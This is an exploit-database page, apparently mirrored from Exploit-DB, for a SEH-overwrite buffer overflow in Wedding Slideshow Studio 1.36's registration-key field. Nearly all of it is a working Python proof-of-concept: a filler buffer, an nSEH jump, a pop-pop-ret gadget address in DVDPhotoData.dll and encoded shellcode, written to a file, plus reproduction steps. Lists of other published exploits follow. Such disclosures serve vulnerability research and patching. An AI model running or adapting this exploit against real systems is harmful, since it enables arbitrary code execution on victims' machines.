Menu

Search for hundreds of thousands of exploits

"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"

Author

Exploit author

ZwX

Platform

Exploit platform

windows

Release date

Exploit published date

2020-02-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#Exploit Title: Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-09
#Vendor Homepage : http://www.wedding-slideshow-studio.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "poc.txt".
#2. Just copy the text inside "poc.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "poc.txt" into the field: "Registration Key" > Click "Ok"
#5. The calculator runs successfully

#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10023b8a)
#0x10023b8a : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [DVDPhotoData.dll] 
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode
try:
    f=open("poc.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
Release DateTitleTypePlatformAuthor
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload"webappsphp"Mehran Feizi"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-12"HP System Event Utility - Local Privilege Escalation"localwindowshyp3rlinx
2020-02-12"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow"localwindowsZwX
2020-02-11"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting"webappscgiLuca.Chiou
2020-02-11"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting"webappsphp"Sayak Naskar"
2020-02-11"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)"webappsphpMetasploit
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-10"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-10"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"localwindowsZwX
Release DateTitleTypePlatformAuthor
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-12"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow"localwindowsZwX
2020-02-12"HP System Event Utility - Local Privilege Escalation"localwindowshyp3rlinx
2020-02-12"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow"localwindowsZwX
2020-02-11"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-10"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-10"Dota 2 7.23f - Denial of Service (PoC)"doswindows"Bogdan Kurinnoy"
2020-02-10"Ricoh Driver - Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-02-07"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-02-06"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path"localwindowsZwX
2020-02-06"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"TapinRadio 2.12.3 - 'address' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)"doswindowschuyreds
2020-02-06"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)"doswindowschuyreds
2020-01-29"XMLBlueprint 16.191112 - XML External Entity Injection"localwindows"Javier Olmedo"
Release DateTitleTypePlatformAuthor
2020-02-12"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow"localwindowsZwX
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-11"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-10"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-06"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path"localwindowsZwX
2020-01-13"Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions"localwindowsZwX
2020-01-09"MSN Password Recovery 1.30 - XML External Entity Injection"localxmlZwX
2020-01-09"ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)"doswindowsZwX
2020-01-06"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path"localwindowsZwX
2019-12-18"AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow"localwindowsZwX
2019-12-18"XnView 2.49.1 - 'Research' Denial of Service (PoC)"doswindowsZwX
2019-12-05"Amiti Antivirus 25.0.640 - Unquoted Service Path"localwindowsZwX
2019-12-05"NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path"localwindowsZwX
2019-12-04"Microsoft Visual Basic 2010 Express - XML External Entity Injection"localxmlZwX
2019-11-29"SpotAuditor 5.3.2 - 'Name' Denial of Service"doswindowsZwX
2019-11-29"SpotAuditor 5.3.2 - 'Key' Denial of Service"doswindowsZwX
2019-11-27"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)"doswindowsZwX
2019-11-27"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)"doswindowsZwX
2019-11-22"ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path"localwindowsZwX
2019-11-22"LiteManager 4.5.0 - Insecure File Permissions"localwindowsZwX
2019-11-19"XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service"doswindowsZwX
2019-11-19"BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path"localwindowsZwX
2019-11-18"MobileGo 8.5.0 - Insecure File Permissions"localwindowsZwX
2018-09-13"Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)"doswindows_x86ZwX
2018-09-13"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow"localwindowsZwX
2018-08-29"R 3.4.4 - Buffer Overflow (SEH)"localwindowsZwX
2016-12-16"WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection"webappsphpZwX
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48028/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse